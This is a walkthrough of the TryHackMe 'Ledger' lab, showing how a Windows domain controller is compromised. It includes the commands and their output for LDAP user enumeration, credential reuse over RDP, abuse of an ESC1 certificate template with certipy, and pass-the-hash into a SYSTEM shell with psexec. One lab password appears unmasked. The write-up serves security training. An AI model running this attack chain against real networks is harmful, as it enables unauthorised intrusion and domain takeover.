Ledger - TryHackMe - Walkthrough
Pwn a Windows Domain Controller.
This is a write-up for the ‘Ledger’ challenge available on TryHackMe; you can find the hard rated room there: https://tryhackme.com/room/ledger.
Description
Start the virtual machine by pressing the Start Machine button attached in this task. You may access the VM by using the AttackBox or your VPN connection.
Can you find all the flags?
Note: The VM takes about 5 minutes to fully boot up. All the necessary tools are already available on the AttackBox.
Enumeration
As always I started with a basic nmap scan.
1
sudo nmap -sV -sC -oA nmap/machine -vv 10.10.214.56
The results showed 14 open ports. The TTL reveals that the server is a Windows server and the LDAP,RDP and SMB ports reveal that this is a domain controller. The server has two web servers running one on port 80, the other one on port 443, they do not display anything. In addition to that RDP is available at port 3389. Finally LDAP is accessible via port 389 and port 636.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-03 14:59:43Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:labyrinth.thm.local
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
443/tcp open ssl/http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA/domainComponent=thm
| Issuer: commonName=thm-LABYRINTH-CA/domainComponent=thm
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-05-03T15:00:32+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: LABYRINTH
| DNS_Domain_Name: thm.local
| DNS_Computer_Name: labyrinth.thm.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-05-03T15:00:24+00:00
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Issuer: commonName=labyrinth.thm.local
Also, the scan discloses the domain name and the host name of the domain controller. The domain is thm.local and the host name LABYRINTH.
Initial Access
The first thing I did is enumerating the domain controller for users and policies. To accomplish this, you can use netexec and query LDAP which allows you to query user information.
1
nxc ldap 10.10.214.56 -u "a" -p "" --users
Note: The command above will return a massive amount of users, descriptions and additional information, the lines below are only the important ones.
In the output of the command, there are two users who seem to have requested a password reset, as indicated by the text and password included in their descriptions.
1
2
LDAP 10.10.214.56 389 LABYRINTH IVY_WILLIS 2023-05-30 12:30:55 0 Please change it: ************
LDAP 10.10.214.56 389 LABYRINTH SUSANNA_MCKNIGHT 2023-07-05 15:11:32 0 Please change it: ************
Next I checked if one of the users has access to RDP and potentially can login and get a shell. For that you can first try to gather information using bloodhound, but this time you can simply check it using the command line and don’t need to go through the complex process of setting up bloodhound. I simply tried it with netexec:
1
2
3
4
5
6
$nxc rdp 10.10.214.56 -u "IVY_WILLIS" -p "************"
RDP 10.10.214.56 3389 LABYRINTH [*] Windows 10 or Windows Server 2016 Build 17763 (name:LABYRINTH) (domain:thm.local) (nla:True)
RDP 10.10.214.56 3389 LABYRINTH [+] thm.local\IVY_WILLIS:************
$nxc rdp 10.10.214.56 -u "SUSANNA_MCKNIGHT" -p "************"
RDP 10.10.214.56 3389 LABYRINTH [*] Windows 10 or Windows Server 2016 Build 17763 (name:LABYRINTH) (domain:thm.local) (nla:True)
RDP 10.10.214.56 3389 LABYRINTH [+] thm.local\SUSANNA_MCKNIGHT:************ (Pwn3d!)
Fortunately, the user SUSANNA_MCKNIGHT has access to RDP and can login. I connected to the server using Remmina which is a simple RDP tool.
After login you are greeted with the user flag.
Privilege Escalation
To gain further privileges I enumerated the users privileges using the command prompt.
I found the group below:
1
2
3
4
$ whoami /all
...
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
...
The group Certificate Service DCOM Access, to which the user SUSANNA_MCKNIGHT has access is a strong indicator that you need to exploit a certificate vulnerability to root this machine.
To enumerate any certificates you normally can use Certify.exe, which you can simply load on the machine and then you can enumerate the certificates. In this case this is not possible because the server is running Windows Defender, which will remove the file immediately after it is uploaded. To overcome this issue there is a tool called certipy which can be used to enumerate and exploit the server from your own, so no need for an executable.
For exploiting a weak managed certificate you first need to find one, certipy has a handy built in function for scanning for vulnerable certs.
1
certipy find -u 'SUSANNA_MCKNIGHT' -p "************" -dc-ip 10.10.214.56 -vulnerable -stdout
Executing the command will yield three certificates as a result. The first one is root Certificate of the Public Key Infrastructure (PKI). So this is not useful. The third certificate is disabled, so also not useful. Finally the second certificate looks promising:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Template Name : ServerAuth
Display Name : ServerAuth
Certificate Authorities : thm-LABYRINTH-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : THM.LOCAL\Domain Admins
THM.LOCAL\Domain Computers
THM.LOCAL\Enterprise Admins
THM.LOCAL\Authenticated Users
Object Control Permissions
Owner : THM.LOCAL\Administrator
Write Owner Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
Write Dacl Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
Write Property Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
[!] Vulnerabilities
ESC1 : 'THM.LOCAL\\Domain Computers' and 'THM.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
1
The certificate is vulnerable to ESC1. With that any low-privileged user can request a certificate that allows them to authenticate as a privileged user (e.g., a Domain Admin), due to a misconfigured or overly permissive AD CS template.
I first searched for a user which is in the domain admin group and can login with a simple shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ Get-ADGroupMember -Identity "Domain Admins" -Recursive
distinguishedName : CN=Administrator,CN=Users,DC=thm,DC=local
name : Administrator
objectClass : user
objectGUID : 07822fd3-6443-4bf6-bb1e-341283a7318c
SamAccountName : Administrator
SID : S-1-5-21-1966530601-3185510712-10604624-500
distinguishedName : CN=BERNARD_CARNEY,OU=AZR,OU=Tier 1,DC=thm,DC=local
name : BERNARD_CARNEY
objectClass : user
objectGUID : a29b0bc2-9fe0-4e8e-a905-ec4f77fe3a39
SamAccountName : BERNARD_CARNEY
SID : S-1-5-21-1966530601-3185510712-10604624-1248
distinguishedName : CN=BRADLEY_ORTIZ,OU=FSR,OU=Tier 1,DC=thm,DC=local
name : BRADLEY_ORTIZ
objectClass : user
objectGUID : 319bff06-5900-44cd-b9b6-a3fc5c157ef0
SamAccountName : BRADLEY_ORTIZ
SID : S-1-5-21-1966530601-3185510712-10604624-1358
distinguishedName : CN=BEVERLY_FARRELL,OU=AZR,OU=Tier 1,DC=thm,DC=local
name : BEVERLY_FARRELL
objectClass : user
objectGUID : 88672f30-9c2f-4485-ba69-5d375b581d55
SamAccountName : BEVERLY_FARRELL
SID : S-1-5-21-1966530601-3185510712-10604624-1588
Then I tired getting a certificate of the first two members of the group but that didn’t work. The user which worked was BRADLEY_ORTIZ, so I generated a certificate request.
1
certipy req -u 'SUSANNA_MCKNIGHT' -p 'CHANGEME2023!' -ca 'thm-LABYRINTH-CA' -template ServerAuth -upn 'BRADLEY_ORTIZ@THM.LOCAL' -dc-ip 10.10.214.56
Then I authenticated, which returns the hashes of the user:
1
certipy auth -pfx bradley_ortiz.pfx -dc-ip 10.10.214.56
And finally I used the hashes to get a shell.
Note: You need to add the domain name to your host file for that: echo "10.10.214.56 thm.local" | sudo tee -a /etc/hosts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ psexec.py -hashes hash:hash thm.local/BRADLEY_ORTIZ@THM.LOCAL
Impacket v0.13.0.dev0+20250109.91705.ac02e0ee - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on THM.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file tFgsvPDT.exe
[*] Opening SVCManager on THM.LOCAL.....
[*] Creating service DiNi on THM.LOCAL.....
[*] Starting service DiNi.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4377]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\Administrator\Desktop
05/31/2023 08:18 AM <DIR> .
05/31/2023 08:18 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
05/31/2023 07:33 AM 29 root.txt
3 File(s) 1,110 bytes
2 Dir(s) 12,483,411,968 bytes free
C:\Users\Administrator\Desktop>
Conclusion
Misconfigured/Vulnerable certificates are always something to check in CTFs, all in all the room was really nice.